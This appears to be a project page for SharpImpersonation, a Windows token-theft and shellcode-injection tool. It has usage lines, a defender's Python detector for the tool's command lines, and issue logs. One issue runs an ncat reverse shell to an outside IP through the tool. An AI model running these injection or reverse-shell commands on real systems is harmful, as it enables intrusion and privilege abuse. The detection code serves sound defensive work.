
sharpimpersonation's Introduction

SharpImpersonation

This was a learning-by-doing project from my side. Well-known techniques are used to build just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:

A blog post for the introduction can be found here:

List user processes

PS C:\temp> SharpImpersonation.exe list

List only elevated processes

PS C:\temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>

Inject base64 encoded shellcode into the first process of the target user

PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>

Inject shellcode loaded from a webserver into the first process of the target user

PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>

Impersonate the target user via ImpersonateLoggedOnuser for the current session

PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

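For defenders, the argument syntax shown in the usage lines above can be matched in process-creation telemetry even when the executable has been renamed. The following is an added example, not code from the SharpImpersonation project; the event records, the svc.exe name, the CORP\alice account and the mode labels are constructed for illustration.

```python
import re

# key:value tokens as they appear in the usage lines above; values may be quoted.
TOKEN = re.compile(r'(?i)(?<!\S)(user|binary|shellcode|technique):("[^"]*"|\S*)')
LIST = re.compile(r'(?i)sharpimpersonation(?:\.exe)?"?\s+list(\s+elevated)?\s*$')
BASE64 = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')

def classify(cmdline):
    """Map a process command line to the tool mode it matches, or None."""
    args = {k.lower(): v.strip('"') for k, v in TOKEN.findall(cmdline)}
    if "user" not in args:
        # list modes carry no key:value token, so only the image name reveals them
        m = LIST.search(cmdline)
        return ("list-elevated" if m.group(1) else "list") if m else None
    if "shellcode" in args:
        value = args["shellcode"]
        if re.match(r'(?i)https?://', value):
            return "shellcode-from-url"
        return "shellcode-base64" if BASE64.fullmatch(value) else "shellcode-other"
    if args.get("technique", "").lower() == "impersonateloggedonuser":
        return "impersonate-current-session"
    return "binary-as-user" if "binary" in args else None

def scan(events):
    """Return (pid, mode) for every event whose command line matches."""
    hits = []
    for ev in events:
        mode = classify(ev["cmdline"])
        if mode:
            hits.append((ev["pid"], mode))
    return hits

# Constructed process-creation records (not from the page); svc.exe stands in
# for a renamed copy to show that matching is on arguments, not the file name.
# The base64 value is the harmless text "ABCDEFGHIJKLMNOP".
SAMPLE_EVENTS = [
    {"pid": 4100, "cmdline": r'C:\temp\SharpImpersonation.exe list elevated'},
    {"pid": 4112, "cmdline": r'C:\temp\svc.exe user:CORP\alice binary:"C:\Windows\System32\cmd.exe"'},
    {"pid": 4120, "cmdline": r'C:\temp\svc.exe user:CORP\alice shellcode:https://files.example.invalid/a.bin'},
    {"pid": 4131, "cmdline": r'C:\temp\svc.exe user:CORP\alice shellcode:QUJDREVGR0hJSktMTU5PUA=='},
    {"pid": 4140, "cmdline": r'C:\temp\svc.exe user:CORP\alice technique:ImpersonateLoggedOnuser'},
    {"pid": 4150, "cmdline": r'C:\Windows\System32\runas.exe /user:CORP\alice cmd.exe'},
]

if __name__ == "__main__":
    for pid, mode in scan(SAMPLE_EVENTS):
        print(pid, mode)
```

The runas.exe record is left unflagged because its /user: switch is not a bare user: token. A renamed copy run in list mode is not caught by command line alone and needs a hash or signature match.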

sharpimpersonation's People

Contributors

s3cur3th1ssh1t, stryker2k2


sharpimpersonation's Issues

The directory name is invalid (PSEXEC)

Hi, when I run the program with psexec, I get this error. How can I solve the problem?

[*] CreateProcessWithLogonW
[-] Function CreateProcessWithLogonW failed:
[-] The directory name is invalid

[-] NtQueryInformationToken failed - error code: 3221225507

This just loops:

[*] Username given, checking processes

[+] NtOpenProcess Success!

[+] NtOpenProcessToken Success!
[-] NtQueryInformationToken failed - error code: 3221225507
[+] NtQueryInformationToken Success!

[+] NtClose Success!

[+] NtClose Success!

[+] NtOpenProcess Success!

Access denied

[*] Changing WINSTA/Desktop permissions for the target user: NT AUTHORITY\SYSTEM
[*] Setting Permission for : NT AUTHORITY\SYSTEM

[*] Stealing token from ProcID: 2256 to start binary: powershell.exe whoami
[+] Recieved Handle for: (2256)
[+] Process Handle: 0x02D4
[+] Primary Token Handle: 0x02D8
[+] Duplicate Token Handle: 0x02D4
[*] Adjusting Token Privilege
SeAuditPrivilege
[+] Recieved luid
[*] AdjustTokenPrivilege
[+] Adjusted Privilege: SeAuditPrivilege
[+] Privilege State: SE_PRIVILEGE_ENABLED
[*] CreateProcessWithTokenW
Starting C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe with arguments whoami
Directory: C:\Users\Administrator\Desktop
Tried starting process, return value is False
[-] Function CreateProcessWithTokenW failed:
[-] Access denied.

The directory name is invalid

I keep getting this error:
[*] CreateProcessWithLogonW
[-] Function CreateProcessWithLogonW failed:
[-] The directory name is invalid

I tried to find this reference in the codebase but it didn't really seem to highlight anything. Thanks for the help!

The commands below give the same result:

SharpImpersonation.exe user:xor\david binary:"C:\Windows\temp\ncat.exe 192.168.119.127 443 -e cmd.exe"
SharpImpersonation.exe user:xor\david binary:"C:\Windows\temp\ncat.exe 192.168.119.127 443 -e cmd.exe"
SharpImpersonation.exe user:xor\david binary:"ncat.exe 192.168.119.127 443 -e cmd.exe"

The inject shellcode command works just fine though:
SharpImpersonation.exe user:xor\david shellcode:

[*] Username given, checking processes

[+] Found process for user xor\david with PID: 2752

[*] Adjusting Token Privilege
SeDebugPrivilege
 [+] Recieved luid
 [*] AdjustTokenPrivilege
 [+] Adjusted Privilege: SeDebugPrivilege
 [+] Privilege State: SE_PRIVILEGE_ENABLED

 [*] Changing WINSTA/Desktop permissions for the target user: xor\david
 [*] Setting Permission for : xor\david

[*] Stealing token from ProcID: 2752 to start binary: ncat.exe 192.168.119.127 443 -e cmd.exe
[+] Recieved Handle for:  (2752)
 [+] Process Handle: 0x0328
[+] Primary Token Handle: 0x0300
 [+] Duplicate Token Handle: 0x0328
[*] Adjusting Token Privilege
SeAuditPrivilege
 [+] Recieved luid
 [*] AdjustTokenPrivilege
 [+] Adjusted Privilege: SeAuditPrivilege
 [+] Privilege State: SE_PRIVILEGE_ENABLED
Starting ncat.exe
Starting C:\Windows\temp\ncat.exe
[*] CreateProcessWithLogonW
 [-] Function CreateProcessWithLogonW failed: 
 [-] The directory name is invalid

Dir List:

PS C:\Windows\temp> 
dir
dir


    Directory: C:\Windows\temp


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       12/29/2021   5:56 PM                DiagTrack_alternativeTrace                                            
d-----       12/29/2021   5:56 PM                DiagTrack_aot                                                         
d-----       12/29/2021   5:56 PM                DiagTrack_diag                                                        
d-----       12/29/2021   5:56 PM                DiagTrack_miniTrace                                                   
d-----       12/29/2021  11:40 AM                vmware-SYSTEM                                                         
-a----       12/29/2021  11:13 AM          32768 ConPtyShell.exe                                                       
-a----       12/29/2021   9:00 AM          11264 inject.exe                                                            
-a----       12/29/2021   1:30 PM          44544 InjectProc.exe                                                        
-a----       12/29/2021   1:33 PM          66174 Invoke-ConPtyShell.ps1                                                
-a----       12/28/2021   9:49 PM          18078 MpCmdRun.log                                                          
-a----       12/29/2021   1:51 PM        1667584 ncat.exe                                                              
-a----       12/29/2021   2:21 PM         128512 SharpImpersonation.exe                                                
-a----       12/29/2021   6:11 PM            102 silconfig.log                                                         
-a----       12/29/2021  11:22 AM         453632 TokenPlayer.exe                                                       
-a----       12/29/2021   5:55 PM          68323 vmware-vmsvc.log                                                      
-a----       12/29/2021   6:11 PM            414 vmware-vmusr.log                                                      
-a----       12/29/2021   5:56 PM            288 vmware-vmvss.log                                                      


PS C:\Windows\temp>
